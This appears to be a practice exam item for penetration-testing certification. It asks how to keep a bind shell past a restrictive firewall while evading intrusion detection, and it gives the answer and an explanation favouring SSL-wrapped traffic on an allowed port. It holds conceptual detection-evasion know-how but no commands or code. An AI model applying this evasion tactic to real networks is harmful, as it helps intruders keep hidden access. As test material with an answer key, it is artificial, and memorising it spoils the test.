As you establish a foothold within a network during an internal penetration test, you've identified a server with a strict outbound firewall policy that prevents reverse shells from connecting to your machine. Your next step is to maintain access with a bind shell. Due to the firewall restrictions, which of the following techniques would allow the compromised server to listen for your connection while minimizing the risk of detection by the network intrusion detection system?
Avoid using a shell by relying solely on periodic command execution to achieve a similar outcome.
Configure the shell to listen on a commonly monitored port like 4444, expecting penetration testers to use it.
Wrap the bind shell traffic with SSL and use a port allowed by the firewall policy.
Bind the shell to a common port like 80/http to blend in with normal traffic, relying on the obscurity for protection.
To avoid detection by network intrusion detection systems, a bind shell can be configured to use non-standard ports that are allowed through the firewall or to mimic allowed protocols, reducing the chance of the shell's traffic being flagged as anomalous. SSL wrapping adds an encryption layer that makes it more difficult for the intrusion detection systems to analyze the traffic for shell-like behavior. Merely using common ports or no encryption would not be sufficient to evade intrusion detection systems, which are designed to recognize malicious traffic patterns and potentially unauthorized connections even over typically benign ports.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is a bind shell and how does it work?
Open an interactive chat with Bash
What is SSL wrapping and why is it used in penetration testing?
Open an interactive chat with Bash
What are network intrusion detection systems (NIDS) and how do they function?